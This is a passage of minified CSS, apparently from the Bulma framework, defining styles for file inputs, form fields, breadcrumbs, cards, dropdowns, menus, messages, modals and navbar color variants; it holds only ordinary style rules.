.file-name{border-bottom-left-radius:0;border-top-left-radius:0}.file.has-name.is-empty .file-cta{border-radius:4px}.file.has-name.is-empty .file-name{display:none}.file.is-boxed .file-label{flex-direction:column}.file.is-boxed .file-cta{flex-direction:column;height:auto;padding:1em 3em}.file.is-boxed .file-name{border-width:0 1px 1px}.file.is-boxed .file-icon{height:1.5em;width:1.5em}.file.is-boxed .file-icon .fa{font-size:21px}.file.is-boxed.is-small .file-icon .fa{font-size:14px}.file.is-boxed.is-medium .file-icon .fa{font-size:28px}.file.is-boxed.is-large .file-icon .fa{font-size:35px}.file.is-boxed.has-name .file-cta{border-radius:4px 4px 0 0}.file.is-boxed.has-name .file-name{border-radius:0 0 4px 4px;border-width:0 1px 1px}.file.is-centered{justify-content:center}.file.is-fullwidth .file-label{width:100%}.file.is-fullwidth .file-name{flex-grow:1;max-width:none}.file.is-right{justify-content:flex-end}.file.is-right .file-cta{border-radius:0 4px 4px 0}.file.is-right .file-name{border-radius:4px 0 0 4px;border-width:1px 0 1px 1px;order:-1}.file-label{align-items:stretch;display:flex;cursor:pointer;justify-content:flex-start;overflow:hidden;position:relative}.file-label:hover .file-cta{background-color:#eee;color:#363636}.file-label:hover .file-name{border-color:#d5d5d5}.file-label:active .file-cta{background-color:#e8e8e8;color:#363636}.file-label:active .file-name{border-color:#cfcfcf}.file-input{height:100%;left:0;opacity:0;outline:none;position:absolute;top:0;width:100%}.file-cta,.file-name{border-color:#dbdbdb;border-radius:4px;font-size:1em;padding-left:1em;padding-right:1em;white-space:nowrap}.file-cta{background-color:#f5f5f5;color:#4a4a4a}.file-name{border-color:#dbdbdb;border-style:solid;border-width:1px 1px 1px 0;display:block;max-width:16em;overflow:hidden;text-align:inherit;text-overflow:ellipsis}.file-icon{align-items:center;display:flex;height:1em;justify-content:center;margin-right:.5em;width:1em}.file-icon .fa{font-size:14px}.label{color:#363636;display:block;font-size:1rem;font-weight:700}.label:not(:last-child){margin-bottom:.5em}.label.is-small{font-size:.75rem}.label.is-medium{font-size:1.25rem}.label.is-large{font-size:1.5rem}.help{display:block;font-size:.75rem;margin-top:.25rem}.help.is-white{color:#fff}.help.is-black{color:#0a0a0a}.help.is-light{color:#f5f5f5}.help.is-dark{color:#363636}.help.is-primary{color:#00d1b2}.help.is-link{color:#485fc7}.help.is-info{color:#3e8ed0}.help.is-success{color:#48c78e}.help.is-warning{color:#ffe08a}.help.is-danger{color:#f14668}.field:not(:last-child){margin-bottom:.75rem}.field.has-addons{display:flex;justify-content:flex-start}.field.has-addons .control:not(:last-child){margin-right:-1px}.field.has-addons .control:not(:first-child):not(:last-child) .button,.field.has-addons .control:not(:first-child):not(:last-child) .input,.field.has-addons .control:not(:first-child):not(:last-child) .select select{border-radius:0}.field.has-addons .control:first-child:not(:only-child) .button,.field.has-addons .control:first-child:not(:only-child) .input,.field.has-addons .control:first-child:not(:only-child) .select select{border-bottom-right-radius:0;border-top-right-radius:0}.field.has-addons .control:last-child:not(:only-child) .button,.field.has-addons .control:last-child:not(:only-child) .input,.field.has-addons .control:last-child:not(:only-child) .select select{border-bottom-left-radius:0;border-top-left-radius:0}.field.has-addons .control .button:not([disabled]):hover,.field.has-addons .control .button:not([disabled]).is-hovered,.field.has-addons .control .input:not([disabled]):hover,.field.has-addons .control .input:not([disabled]).is-hovered,.field.has-addons .control .select select:not([disabled]):hover,.field.has-addons .control .select select:not([disabled]).is-hovered{z-index:2}.field.has-addons .control .button:not([disabled]):focus,.field.has-addons .control .button:not([disabled]).is-focused,.field.has-addons .control .button:not([disabled]):active,.field.has-addons .control .button:not([disabled]).is-active,.field.has-addons .control .input:not([disabled]):focus,.field.has-addons .control .input:not([disabled]).is-focused,.field.has-addons .control .input:not([disabled]):active,.field.has-addons .control .input:not([disabled]).is-active,.field.has-addons .control .select select:not([disabled]):focus,.field.has-addons .control .select select:not([disabled]).is-focused,.field.has-addons .control .select select:not([disabled]):active,.field.has-addons .control .select select:not([disabled]).is-active{z-index:3}.field.has-addons .control .button:not([disabled]):focus:hover,.field.has-addons .control .button:not([disabled]).is-focused:hover,.field.has-addons .control .button:not([disabled]):active:hover,.field.has-addons .control .button:not([disabled]).is-active:hover,.field.has-addons .control .input:not([disabled]):focus:hover,.field.has-addons .control .input:not([disabled]).is-focused:hover,.field.has-addons .control .input:not([disabled]):active:hover,.field.has-addons .control .input:not([disabled]).is-active:hover,.field.has-addons .control .select select:not([disabled]):focus:hover,.field.has-addons .control .select select:not([disabled]).is-focused:hover,.field.has-addons .control .select select:not([disabled]):active:hover,.field.has-addons .control .select select:not([disabled]).is-active:hover{z-index:4}.field.has-addons .control.is-expanded{flex-grow:1;flex-shrink:1}.field.has-addons.has-addons-centered{justify-content:center}.field.has-addons.has-addons-right{justify-content:flex-end}.field.has-addons.has-addons-fullwidth .control{flex-grow:1;flex-shrink:0}.field.is-grouped{display:flex;justify-content:flex-start}.field.is-grouped>.control{flex-shrink:0}.field.is-grouped>.control:not(:last-child){margin-bottom:0;margin-right:.75rem}.field.is-grouped>.control.is-expanded{flex-grow:1;flex-shrink:1}.field.is-grouped.is-grouped-centered{justify-content:center}.field.is-grouped.is-grouped-right{justify-content:flex-end}.field.is-grouped.is-grouped-multiline{flex-wrap:wrap}.field.is-grouped.is-grouped-multiline>.control:last-child,.field.is-grouped.is-grouped-multiline>.control:not(:last-child){margin-bottom:.75rem}.field.is-grouped.is-grouped-multiline:last-child{margin-bottom:-.75rem}.field.is-grouped.is-grouped-multiline:not(:last-child){margin-bottom:0}@media screen and (min-width: 769px),print{.field.is-horizontal{display:flex}}.field-label .label{font-size:inherit}@media screen and (max-width: 768px){.field-label{margin-bottom:.5rem}}@media screen and (min-width: 769px),print{.field-label{flex-basis:0;flex-grow:1;flex-shrink:0;margin-right:1.5rem;text-align:right}.field-label.is-small{font-size:.75rem;padding-top:.375em}.field-label.is-normal{padding-top:.375em}.field-label.is-medium{font-size:1.25rem;padding-top:.375em}.field-label.is-large{font-size:1.5rem;padding-top:.375em}}.field-body .field .field{margin-bottom:0}@media screen and (min-width: 769px),print{.field-body{display:flex;flex-basis:0;flex-grow:5;flex-shrink:1}.field-body .field{margin-bottom:0}.field-body>.field{flex-shrink:1}.field-body>.field:not(.is-narrow){flex-grow:1}.field-body>.field:not(:last-child){margin-right:.75rem}}.control{box-sizing:border-box;clear:both;font-size:1rem;position:relative;text-align:inherit}.control.has-icons-left .input:focus~.icon,.control.has-icons-left .select:focus~.icon,.control.has-icons-right .input:focus~.icon,.control.has-icons-right .select:focus~.icon{color:#4a4a4a}.control.has-icons-left .input.is-small~.icon,.control.has-icons-left .select.is-small~.icon,.control.has-icons-right .input.is-small~.icon,.control.has-icons-right .select.is-small~.icon{font-size:.75rem}.control.has-icons-left .input.is-medium~.icon,.control.has-icons-left .select.is-medium~.icon,.control.has-icons-right .input.is-medium~.icon,.control.has-icons-right .select.is-medium~.icon{font-size:1.25rem}.control.has-icons-left .input.is-large~.icon,.control.has-icons-left .select.is-large~.icon,.control.has-icons-right .input.is-large~.icon,.control.has-icons-right .select.is-large~.icon{font-size:1.5rem}.control.has-icons-left .icon,.control.has-icons-right .icon{color:#dbdbdb;height:2.5em;pointer-events:none;position:absolute;top:0;width:2.5em;z-index:4}.control.has-icons-left .input,.control.has-icons-left .select select{padding-left:2.5em}.control.has-icons-left .icon.is-left{left:0}.control.has-icons-right .input,.control.has-icons-right .select select{padding-right:2.5em}.control.has-icons-right .icon.is-right{right:0}.control.is-loading:after{position:absolute!important;right:.625em;top:.625em;z-index:4}.control.is-loading.is-small:after{font-size:.75rem}.control.is-loading.is-medium:after{font-size:1.25rem}.control.is-loading.is-large:after{font-size:1.5rem}.breadcrumb{font-size:1rem;white-space:nowrap}.breadcrumb a{align-items:center;color:#485fc7;display:flex;justify-content:center;padding:0 .75em}.breadcrumb a:hover{color:#363636}.breadcrumb li{align-items:center;display:flex}.breadcrumb li:first-child a{padding-left:0}.breadcrumb li.is-active a{color:#363636;cursor:default;pointer-events:none}.breadcrumb li+li:before{color:#b5b5b5;content:"/"}.breadcrumb ul,.breadcrumb ol{align-items:flex-start;display:flex;flex-wrap:wrap;justify-content:flex-start}.breadcrumb .icon:first-child{margin-right:.5em}.breadcrumb .icon:last-child{margin-left:.5em}.breadcrumb.is-centered ol,.breadcrumb.is-centered ul{justify-content:center}.breadcrumb.is-right ol,.breadcrumb.is-right ul{justify-content:flex-end}.breadcrumb.is-small{font-size:.75rem}.breadcrumb.is-medium{font-size:1.25rem}.breadcrumb.is-large{font-size:1.5rem}.breadcrumb.has-arrow-separator li+li:before{content:"→"}.breadcrumb.has-bullet-separator li+li:before{content:"•"}.breadcrumb.has-dot-separator li+li:before{content:"·"}.breadcrumb.has-succeeds-separator li+li:before{content:"≻"}.card{background-color:#fff;border-radius:.25rem;box-shadow:0 .5em 1em -.125em #0a0a0a1a,0 0 0 1px #0a0a0a05;color:#4a4a4a;max-width:100%;position:relative}.card-header:first-child,.card-content:first-child,.card-footer:first-child{border-top-left-radius:.25rem;border-top-right-radius:.25rem}.card-header:last-child,.card-content:last-child,.card-footer:last-child{border-bottom-left-radius:.25rem;border-bottom-right-radius:.25rem}.card-header{background-color:transparent;align-items:stretch;box-shadow:0 .125em .25em #0a0a0a1a;display:flex}.card-header-title{align-items:center;color:#363636;display:flex;flex-grow:1;font-weight:700;padding:.75rem 1rem}.card-header-title.is-centered{justify-content:center}.card-header-icon{-moz-appearance:none;-webkit-appearance:none;appearance:none;background:none;border:none;color:currentColor;font-family:inherit;font-size:1em;margin:0;padding:0;align-items:center;cursor:pointer;display:flex;justify-content:center;padding:.75rem 1rem}.card-image{display:block;position:relative}.card-image:first-child img{border-top-left-radius:.25rem;border-top-right-radius:.25rem}.card-image:last-child img{border-bottom-left-radius:.25rem;border-bottom-right-radius:.25rem}.card-content{background-color:transparent;padding:1.5rem}.card-footer{background-color:transparent;border-top:1px solid #ededed;align-items:stretch;display:flex}.card-footer-item{align-items:center;display:flex;flex-basis:0;flex-grow:1;flex-shrink:0;justify-content:center;padding:.75rem}.card-footer-item:not(:last-child){border-right:1px solid #ededed}.card .media:not(:last-child){margin-bottom:1.5rem}.dropdown{display:inline-flex;position:relative;vertical-align:top}.dropdown.is-active .dropdown-menu,.dropdown.is-hoverable:hover .dropdown-menu{display:block}.dropdown.is-right .dropdown-menu{left:auto;right:0}.dropdown.is-up .dropdown-menu{bottom:100%;padding-bottom:4px;padding-top:initial;top:auto}.dropdown-menu{display:none;left:0;min-width:12rem;padding-top:4px;position:absolute;top:100%;z-index:20}.dropdown-content{background-color:#fff;border-radius:4px;box-shadow:0 .5em 1em -.125em #0a0a0a1a,0 0 0 1px #0a0a0a05;padding-bottom:.5rem;padding-top:.5rem}.dropdown-item{color:#4a4a4a;display:block;font-size:.875rem;line-height:1.5;padding:.375rem 1rem;position:relative}a.dropdown-item,button.dropdown-item{padding-right:3rem;text-align:inherit;white-space:nowrap;width:100%}a.dropdown-item:hover,button.dropdown-item:hover{background-color:#f5f5f5;color:#0a0a0a}a.dropdown-item.is-active,button.dropdown-item.is-active{background-color:#485fc7;color:#fff}.dropdown-divider{background-color:#ededed;border:none;display:block;height:1px;margin:.5rem 0}.level{align-items:center;justify-content:space-between}.level code{border-radius:4px}.level img{display:inline-block;vertical-align:top}.level.is-mobile,.level.is-mobile .level-left,.level.is-mobile .level-right{display:flex}.level.is-mobile .level-left+.level-right{margin-top:0}.level.is-mobile .level-item:not(:last-child){margin-bottom:0;margin-right:.75rem}.level.is-mobile .level-item:not(.is-narrow){flex-grow:1}@media screen and (min-width: 769px),print{.level{display:flex}.level>.level-item:not(.is-narrow){flex-grow:1}}.level-item{align-items:center;display:flex;flex-basis:auto;flex-grow:0;flex-shrink:0;justify-content:center}.level-item .title,.level-item .subtitle{margin-bottom:0}@media screen and (max-width: 768px){.level-item:not(:last-child){margin-bottom:.75rem}}.level-left,.level-right{flex-basis:auto;flex-grow:0;flex-shrink:0}.level-left .level-item.is-flexible,.level-right .level-item.is-flexible{flex-grow:1}@media screen and (min-width: 769px),print{.level-left .level-item:not(:last-child),.level-right .level-item:not(:last-child){margin-right:.75rem}}.level-left{align-items:center;justify-content:flex-start}@media screen and (max-width: 768px){.level-left+.level-right{margin-top:1.5rem}}@media screen and (min-width: 769px),print{.level-left{display:flex}}.level-right{align-items:center;justify-content:flex-end}@media screen and (min-width: 769px),print{.level-right{display:flex}}.media{align-items:flex-start;display:flex;text-align:inherit}.media .content:not(:last-child){margin-bottom:.75rem}.media .media{border-top:1px solid rgba(219,219,219,.5);display:flex;padding-top:.75rem}.media .media .content:not(:last-child),.media .media .control:not(:last-child){margin-bottom:.5rem}.media .media .media{padding-top:.5rem}.media .media .media+.media{margin-top:.5rem}.media+.media{border-top:1px solid rgba(219,219,219,.5);margin-top:1rem;padding-top:1rem}.media.is-large+.media{margin-top:1.5rem;padding-top:1.5rem}.media-left,.media-right{flex-basis:auto;flex-grow:0;flex-shrink:0}.media-left{margin-right:1rem}.media-right{margin-left:1rem}.media-content{flex-basis:auto;flex-grow:1;flex-shrink:1;text-align:inherit}@media screen and (max-width: 768px){.media-content{overflow-x:auto}}.menu{font-size:1rem}.menu.is-small{font-size:.75rem}.menu.is-medium{font-size:1.25rem}.menu.is-large{font-size:1.5rem}.menu-list{line-height:1.25}.menu-list a{border-radius:2px;color:#4a4a4a;display:block;padding:.5em .75em}.menu-list a:hover{background-color:#f5f5f5;color:#363636}.menu-list a.is-active{background-color:#485fc7;color:#fff}.menu-list li ul{border-left:1px solid #dbdbdb;margin:.75em;padding-left:.75em}.menu-label{color:#7a7a7a;font-size:.75em;letter-spacing:.1em;text-transform:uppercase}.menu-label:not(:first-child){margin-top:1em}.menu-label:not(:last-child){margin-bottom:1em}.message{background-color:#f5f5f5;border-radius:4px;font-size:1rem}.message strong{color:currentColor}.message a:not(.button):not(.tag):not(.dropdown-item){color:currentColor;text-decoration:underline}.message.is-small{font-size:.75rem}.message.is-medium{font-size:1.25rem}.message.is-large{font-size:1.5rem}.message.is-white{background-color:#fff}.message.is-white .message-header{background-color:#fff;color:#0a0a0a}.message.is-white .message-body{border-color:#fff}.message.is-black{background-color:#fafafa}.message.is-black .message-header{background-color:#0a0a0a;color:#fff}.message.is-black .message-body{border-color:#0a0a0a}.message.is-light{background-color:#fafafa}.message.is-light .message-header{background-color:#f5f5f5;color:#000000b3}.message.is-light .message-body{border-color:#f5f5f5}.message.is-dark{background-color:#fafafa}.message.is-dark .message-header{background-color:#363636;color:#fff}.message.is-dark .message-body{border-color:#363636}.message.is-primary{background-color:#ebfffc}.message.is-primary .message-header{background-color:#00d1b2;color:#fff}.message.is-primary .message-body{border-color:#00d1b2;color:#00947e}.message.is-link{background-color:#eff1fa}.message.is-link .message-header{background-color:#485fc7;color:#fff}.message.is-link .message-body{border-color:#485fc7;color:#3850b7}.message.is-info{background-color:#eff5fb}.message.is-info .message-header{background-color:#3e8ed0;color:#fff}.message.is-info .message-body{border-color:#3e8ed0;color:#296fa8}.message.is-success{background-color:#effaf5}.message.is-success .message-header{background-color:#48c78e;color:#fff}.message.is-success .message-body{border-color:#48c78e;color:#257953}.message.is-warning{background-color:#fffaeb}.message.is-warning .message-header{background-color:#ffe08a;color:#000000b3}.message.is-warning .message-body{border-color:#ffe08a;color:#946c00}.message.is-danger{background-color:#feecf0}.message.is-danger .message-header{background-color:#f14668;color:#fff}.message.is-danger .message-body{border-color:#f14668;color:#cc0f35}.message-header{align-items:center;background-color:#4a4a4a;border-radius:4px 4px 0 0;color:#fff;display:flex;font-weight:700;justify-content:space-between;line-height:1.25;padding:.75em 1em;position:relative}.message-header .delete{flex-grow:0;flex-shrink:0;margin-left:.75em}.message-header+.message-body{border-width:0;border-top-left-radius:0;border-top-right-radius:0}.message-body{border-color:#dbdbdb;border-radius:4px;border-style:solid;border-width:0 0 0 4px;color:#4a4a4a;padding:1.25em 1.5em}.message-body code,.message-body pre{background-color:#fff}.message-body pre code{background-color:transparent}.modal{align-items:center;display:none;flex-direction:column;justify-content:center;overflow:hidden;position:fixed;z-index:40}.modal.is-active{display:flex}.modal-background{background-color:#0a0a0adb}.modal-content,.modal-card{margin:0 20px;max-height:calc(100vh - 160px);overflow:auto;position:relative;width:100%}@media screen and (min-width: 769px){.modal-content,.modal-card{margin:0 auto;max-height:calc(100vh - 40px);width:640px}}.modal-close{background:none;height:40px;position:fixed;right:20px;top:20px;width:40px}.modal-card{display:flex;flex-direction:column;max-height:calc(100vh - 40px);overflow:hidden;-ms-overflow-y:visible}.modal-card-head,.modal-card-foot{align-items:center;background-color:#f5f5f5;display:flex;flex-shrink:0;justify-content:flex-start;padding:20px;position:relative}.modal-card-head{border-bottom:1px solid #dbdbdb;border-top-left-radius:6px;border-top-right-radius:6px}.modal-card-title{color:#363636;flex-grow:1;flex-shrink:0;font-size:1.5rem;line-height:1}.modal-card-foot{border-bottom-left-radius:6px;border-bottom-right-radius:6px;border-top:1px solid #dbdbdb}.modal-card-foot .button:not(:last-child){margin-right:.5em}.modal-card-body{-webkit-overflow-scrolling:touch;background-color:#fff;flex-grow:1;flex-shrink:1;overflow:auto;padding:20px}.navbar{background-color:#fff;min-height:3.25rem;position:relative;z-index:30}.navbar.is-white{background-color:#fff;color:#0a0a0a}.navbar.is-white .navbar-brand>.navbar-item,.navbar.is-white .navbar-brand .navbar-link{color:#0a0a0a}.navbar.is-white .navbar-brand>a.navbar-item:focus,.navbar.is-white .navbar-brand>a.navbar-item:hover,.navbar.is-white .navbar-brand>a.navbar-item.is-active,.navbar.is-white .navbar-brand .navbar-link:focus,.navbar.is-white .navbar-brand .navbar-link:hover,.navbar.is-white .navbar-brand .navbar-link.is-active{background-color:#f2f2f2;color:#0a0a0a}.navbar.is-white .navbar-brand .navbar-link:after{border-color:#0a0a0a}.navbar.is-white .navbar-burger{color:#0a0a0a}@media screen and (min-width: 1024px){.navbar.is-white .navbar-start>.navbar-item,.navbar.is-white .navbar-start .navbar-link,.navbar.is-white .navbar-end>.navbar-item,.navbar.is-white .navbar-end .navbar-link{color:#0a0a0a}.navbar.is-white .navbar-start>a.navbar-item:focus,.navbar.is-white .navbar-start>a.navbar-item:hover,.navbar.is-white .navbar-start>a.navbar-item.is-active,.navbar.is-white .navbar-start .navbar-link:focus,.navbar.is-white .navbar-start .navbar-link:hover,.navbar.is-white .navbar-start .navbar-link.is-active,.navbar.is-white .navbar-end>a.navbar-item:focus,.navbar.is-white .navbar-end>a.navbar-item:hover,.navbar.is-white .navbar-end>a.navbar-item.is-active,.navbar.is-white .navbar-end .navbar-link:focus,.navbar.is-white .navbar-end .navbar-link:hover,.navbar.is-white .navbar-end .navbar-link.is-active{background-color:#f2f2f2;color:#0a0a0a}.navbar.is-white .navbar-start .navbar-link:after,.navbar.is-white .navbar-end .navbar-link:after{border-color:#0a0a0a}.navbar.is-white .navbar-item.has-dropdown:focus .navbar-link,.navbar.is-white .navbar-item.has-dropdown:hover .navbar-link,.navbar.is-white .navbar-item.has-dropdown.is-active .navbar-link{background-color:#f2f2f2;color:#0a0a0a}.navbar.is-white .navbar-dropdown a.navbar-item.is-active{background-color:#fff;color:#0a0a0a}}.navbar.is-black{background-color:#0a0a0a;color:#fff}.navbar.is-black .navbar-brand>.navbar-item,.navbar.is-black .navbar-brand .navbar-link{color:#fff}.navbar.is-black .navbar-brand>a.navbar-item:focus,.navbar.is-black .navbar-brand>a.navbar-item:hover,.navbar.is-black .navbar-brand>a.navbar-item.is-active,.navbar.is-black .navbar-brand .navbar-link:focus,.navbar.is-black .navbar-brand .navbar-link:hover,.navbar.is-black .navbar-brand .navbar-link.is-active{background-color:#000;color:#fff}.navbar.is-black .navbar-brand .navbar-link:after{border-color:#fff}.navbar.is-black .navbar-burger{color:#fff}@media screen and (min-width: 1024px){.navbar.is-black .navbar-start>.navbar-item,.navbar.is-black .navbar-start .navbar-link,.navbar.is-black .navbar-end>.navbar-item,.navbar.is-black .navbar-end .navbar-link{color:#fff}.navbar.is-black .navbar-start>a.navbar-item:focus,.navbar.is-black .navbar-start>a.navbar-item:hover,.navbar.is-black .navbar-start>a.navbar-item.is-active,.navbar.is-black .navbar-start .navbar-link:focus,.navbar.is-black .navbar-start .navbar-link:hover,.navbar.is-black .navbar-start .navbar-link.is-active,.navbar.is-black .navbar-end>a.navbar-item:focus,.navbar.is-black .navbar-end>a.navbar-item:hover,.navbar.is-black .navbar-end>a.navbar-item.is-active,.navbar.is-black .navbar-end .navbar-link:focus,.navbar.is-black .navbar-end .navbar-link:hover,.navbar.is-black .navbar-end .navbar-link.is-active{background-color:#000;color:#fff}.navbar.is-black .navbar-start .navbar-link:after,.navbar.is-black .navbar-end .navbar-link:after{border-color:#fff}.navbar.is-black .navbar-item.has-dropdown:focus .navbar-link,.navbar.is-black .navbar-item.has-dropdown:hover .navbar-link,.navbar.is-black .navbar-item.has-dropdown.is-active .navbar-link{background-color:#000;color:#fff}.navbar.is-black .navbar-dropdown a.navbar-item.is-active{background-color:#0a0a0a;color:#fff}}.navbar.is-light{background-color:#f5f5f5;color:#000000b3}.navbar.is-light .navbar-brand>.navbar-item,.navbar.is-light .navbar-brand .navbar-link{color:#000000b3}.navbar.is-light .navbar-brand>a.navbar-item:focus,.navbar.is-light .navbar-brand>a.navbar-item:hover,.navbar.is-light .navbar-brand>a.navbar-item.is-active,.navbar.is-light .navbar-brand .navbar-link:focus,.navbar.is-light .navbar-brand .navbar-link:hover,.navbar.is-light .navbar-brand .navbar-link.is-active{background-color:#e8e8e8;color:#000000b3}.navbar.is-light .navbar-brand .navbar-link:after{border-color:#000000b3}.navbar.is-light .navbar-burger{color:#000000b3}@media screen and (min-width: 1024px){.navbar.is-light .navbar-start>.navbar-item,.navbar.is-light .navbar-start .navbar-link,.navbar.is-light .navbar-end>.navbar-item,.navbar.is-light .navbar-end .navbar-link{color:#000000b3}.navbar.is-light .navbar-start>a.navbar-item:focus,.navbar.is-light .navbar-start>a.navbar-item:hover,.navbar.is-light .navbar-start>a.navbar-item.is-active,.navbar.is-light .navbar-start .navbar-link:focus,.navbar.is-light .navbar-start .navbar-link:hover,.navbar.is-light .navbar-start .navbar-link.is-active,.navbar.is-light .navbar-end>a.navbar-item:focus,.navbar.is-light .navbar-end>a.navbar-item:hover,.navbar.is-light .navbar-end>a.navbar-item.is-active,.navbar.is-light .navbar-end .navbar-link:focus,.navbar.is-light .navbar-end .navbar-link:hover,.navbar.is-light .navbar-end .navbar-link.is-active{background-color:#e8e8e8;color:#000000b3}.navbar.is-light .navbar-start .navbar-link:after,.navbar.is-light .navbar-end .navbar-link:after{border-color:#000000b3}.navbar.is-light .navbar-item.has-dropdown:focus .navbar-link,.navbar.is-light .navbar-item.has-dropdown:hover .navbar-link,.navbar.is-light .navbar-item.has-dropdown.is-active .navbar-link{background-color:#e8e8e8;color:#000000b3}.navbar.is-light .navbar-dropdown a.navbar-item.is-active{background-color:#f5f5f5;color:#000000b3}}.navbar.is-dark{background-color:#363636;color:#fff}.navbar.is-dark .navbar-brand>.navbar-item,.navbar.is-dark .navbar-brand .navbar-link{color:#fff}.navbar.is-dark .navbar-brand>a.navbar-item:focus,.navbar.is-dark .navbar-brand>a.navbar-item:hover,.navbar.is-dark .navbar-brand>a.navbar-item.is-active,.navbar.is-dark .navbar-brand .navbar-link:focus,.navbar.is-dark .navbar-brand .navbar-link:hover,.navbar.is-dark .navbar-brand .navbar-link.is-active{background-color:#292929;color:#fff}.navbar.is-dark .navbar-brand .navbar-link:after{border-color:#fff}.navbar.is-dark .navbar-burger{color:#fff}@media screen and (min-width: 1024px){.navbar.is-dark .navbar-start>.navbar-item,.navbar.is-dark .navbar-start .navbar-link,.navbar.is-dark .navbar-end>.navbar-item,.navbar.is-dark .navbar-end .navbar-link{color:#fff}.navbar.is-dark .navbar-start>a.navbar-item:focus,.navbar.is-dark .navbar-start>a.navbar-item:hover,.navbar.is-dark .navbar-start>a.navbar-item.is-active,.navbar.is-dark .navbar-start .navbar-link:focus,.navbar.is-dark .navbar-start .navbar-link:hover,.navbar.is-dark .navbar-start .navbar-link.is-active,.navbar.is-dark .navbar-end>a.navbar-item:focus,.navbar.is-dark .navbar-end>a.navbar-item:hover,.navbar.is-dark .navbar-end>a.navbar-item.is-active,.navbar.is-dark .navbar-end .navbar-link:focus,.navbar.is-dark .navbar-end .navbar-link:hover,.navbar.is-dark .navbar-end .navbar-link.is-active{background-color:#292929;color:#fff}.navbar.is-dark .navbar-start .navbar-link:after,.navbar.is-dark .navbar-end .navbar-link:after{border-color:#fff}.navbar.is-dark .navbar-item.has-dropdown:focus .navbar-link,.navbar.is-dark .navbar-item.has-dropdown:hover .navbar-link,.navbar.is-dark .navbar-item.has-dropdown.is-active .navbar-link{background-color:#292929;color:#fff}.navbar.is-dark .navbar-dropdown a.navbar-item.is-active{background-color:#363636;color:#fff}}.navbar.is-primary{background-color:#00d1b2;color:#fff}.navbar.is-primary .navbar-brand>.navbar-item,.navbar.is-primary .navbar-brand .navbar-link{color:#fff}.navbar.is-primary .navbar-brand>a.navbar-item:focus,.navbar.is-primary .navbar-brand>a.navbar-item:hover,.navbar.is-primary .navbar-brand>a.navbar-item.is-active,.navbar.is-primary .navbar-brand .navbar-link:focus,.navbar.is-primary .navbar-brand .navbar-link:hover,.navbar.is-primary .navbar-brand .navbar-link.is-active{background-color:#00b89c;color:#fff}.navbar.is-primary .navbar-brand .navbar-link:after{border-color:#fff}.navbar.is-primary .navbar-burger{color:#fff}@media screen and (min-width: 1024px){.navbar.is-primary .navbar-start>.navbar-item,.navbar.is-primary .navbar-start .navbar-link,.navbar.is-primary .navbar-end>.navbar-item,.navbar.is-primary .navbar-end .navbar-link{color:#fff}.navbar.is-primary .navbar-start>a.navbar-item:focus,.navbar.is-primary .navbar-start>a.navbar-item:hover,.navbar.is-primary .navbar-start>a.navbar-item.is-active,.navbar.is-primary .navbar-start .navbar-link:focus,.navbar.is-primary .navbar-start .navbar-link:hover,.navbar.is-primary .navbar-start .navbar-link.is-active,.navbar.is-primary .navbar-end>a.navbar-item:focus,.navbar.is-primary .navbar-end>a.navbar-item:hover,.navbar.is-primary .navbar-end>a.navbar-item.is-active,.navbar.is-primary .navbar-end .navbar-link:focus,.navbar.is-primary .navbar-end .navbar-link:hover,.navbar.is-primary .navbar-end .navbar-link.is-active{background-color:#00b89c;color:#fff}.navbar.is-primary .navbar-start .navbar-link:after,.navbar.is-primary .navbar-end .navbar-link:after{border-color:#fff}.navbar.is-primary .navbar-item.has-dropdown:focus .navbar-link,.navbar.is-primary .navbar-item.has-dropdown:hover .navbar-link,.navbar.is-primary .navbar-item.has-dropdown.is-active .navbar-link{background-color:#00b89c;color:#fff}.navbar.is-primary .navbar-dropdown a.navbar-item.is-active{background-color:#00d1b2;color:#fff}}.navbar.is-link{background-color:#485fc7;color:#fff}.navbar.is-link .navbar-brand>.navbar-item,.navbar.is-link .navbar-brand .navbar-link{color:#fff}.navbar.is-link .navbar-brand>a.navbar-item:focus,.navbar.is-link .navbar-brand>a.navbar-item:hover,.navbar.is-link .navbar-brand>a.navbar-item.is-active,.navbar.is-link .navbar-brand .navbar-link:focus,.navbar.is-link .navbar-brand .navbar-link:hover,.navbar.is-link .navbar-brand .navbar-link.is-active{background-color:#3a51bb;color:#fff}.navbar.is-link .navbar-brand .navbar-link:after{border-color:#fff}.navbar.is-link .navbar-burger{color:#fff}@media screen and (min-width: 1024px){.navbar.is-link .navbar-start>.navbar-item,.navbar.is-link .navbar-start .navbar-link,.navbar.is-link .navbar-end>.navbar-item,.navbar.is-link .navbar-end .navbar-link{color:#fff}.navbar.is-link .navbar-start>a.navbar-item:focus,.navbar.is-link .navbar-start>a.navbar-item:hover,.navbar.is-link .navbar-start>a.navbar-item.is-active,.navbar.is-link .navbar-start .navbar-link:focus,.navbar.is-link .navbar-start .navbar-link:hover,.navbar.is-link .navbar-start .navbar-link.is-active,.navbar.is-link .navbar-end>a.navbar-item:focus,.navbar.is-link .navbar-end>a.navbar-item:hover,.navbar.is-link .navbar-end>a.navbar-item.is-active,.navbar.is-link .navbar-end .navbar-link:focus,.navbar.is-link .navbar-end .navbar-link:hover,.navbar.is-link .navbar-end .navbar-link.is-active{background-color:#3a51bb;color:#fff}.navbar.is-link .navbar-start .navbar-link:after,.navbar.is-link .navbar-end .navbar-link:after{border-color:#fff}.navbar.is-link .navbar-item.has-dropdown:focus .navbar-link,.navbar.is-link .navbar-item.has-dropdown:hover .navbar-link,.navbar.is-link .navbar-item.has-dropdown.is-active .navbar-link{background-color:#3a51bb;color:#fff}.navbar.is-link .navbar-dropdown a.navbar-item.is-active{background-color:#485fc7;color:#fff}}.navbar.is-info{background-color:#3e8ed0;color:#fff}.navbar.is-info .navbar-brand>.navbar-item,.navbar.is-info .navbar-brand .navbar-link{color:#fff}.navbar.is-info .navbar-brand>a.navbar-item:focus,.navbar.is-info .navbar-brand>a.navbar-item:hover,.navbar.is-info .navbar-brand>a.navbar-item.is-active,.navbar.is-info .navbar-brand .navbar-link:focus,.navbar.is-info .navbar-brand .navbar-link:hover,.navbar.is-info .navbar-brand .navbar-link.is-active{background-color:#3082c5;color:#fff}.navbar.is-info .navbar-brand .navbar-link:after{border-color:#fff}.navbar.is-info .navbar-burger{color:#fff}@media screen and (min-width: 1024px){.navbar.is-info .navbar-start>.navbar-item,.navbar.is-info .navbar-start .navbar-link,.navbar.is-info .navbar-end>.navbar-item,.navbar.is-info .navbar-end .navbar-link{color:#fff}.navbar.is-info .navbar-start>a.navbar-item:focus,.navbar.is-info .navbar-start>a.navbar-item:hover,.navbar.is-info .navbar-start>a.navbar-item.is-active,.navbar.is-info .navbar-start .navbar-link:focus,.navbar.is-info .navbar-start 